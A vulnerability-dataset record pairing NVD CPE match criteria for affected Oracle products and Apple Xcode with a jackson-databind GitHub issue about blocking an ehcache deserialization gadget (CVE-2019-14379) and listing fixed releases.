"criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:*",
"matchCriteriaId": "FCA44E38-EB8C-4E2D-8611-B201F47520E9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FD945A04-174C-46A2-935D-4F92631D1018",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*",
"matchCriteriaId": "51433748-DED0-416D-8BFE-F3493E13772E",
"versionEndExcluding": null,
"versionEndIncluding": "8.0.8",
"versionStartExcluding": null,
"versionStartIncluding": "8.0.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:goldengate_stream_analytics:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F4E7F2AA-B851-4D85-9895-2CDD6BE9FCB4",
"versionEndExcluding": "19.1.0.0.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "989598A3-7012-4F57-B172-02404E20D16D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*",
"matchCriteriaId": "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*",
"matchCriteriaId": "6CBFA960-D242-43ED-8D4C-A60F01B70740",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "0513B305-97EF-4609-A82E-D0CDFF9925BA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*",
"matchCriteriaId": "61A7F6E0-A4A4-4FC3-90CB-156933CB3B9A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_gateway:18.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "99365245-49E8-4616-BD24-CE564AC1D17E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9",
"versionEndExcluding": null,
"versionEndIncluding": "17.12",
"versionStartExcluding": null,
"versionStartIncluding": "17.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*",
"matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*",
"matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*",
"matchCriteriaId": "A0ED83E3-E6BF-4EAA-AF8F-33485A88A218",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*",
"matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*",
"matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*",
"matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:*:*:*:*:*:*:*:*",
"matchCriteriaId": "25993ED6-D4C7-4B68-9F87-274B757A88CC",
"versionEndExcluding": null,
"versionEndIncluding": "19.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F10FB4D-A29B-42B4-B70E-EB82A93F2218",
"versionEndExcluding": null,
"versionEndIncluding": "19.10",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0755E91-2F36-4EC3-8727-E8BF0427E663",
"versionEndExcluding": "13.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/FasterXML/jackson-databind/issues/2387 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"FasterXML",
"jackson-databind"
] | Another gadget type reported regarding a class of ehcache package.
See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem.
-----
Fixed in:
* 2.9.10
* 2.8.11.4
* 2.7.9.6
* 2.6.7.3
| Block one more gadget type (ehcache, CVE-2019-14379) | https://api.github.com/repos/FasterXML/jackson-databind/issues/2387/comments | 4 | 2019-07-23T06:28:01Z | 2019-10-16T04:54:58Z | https://github.com/FasterXML/jackson-databind/issues/2387 | 471,508,431 | 2,387 |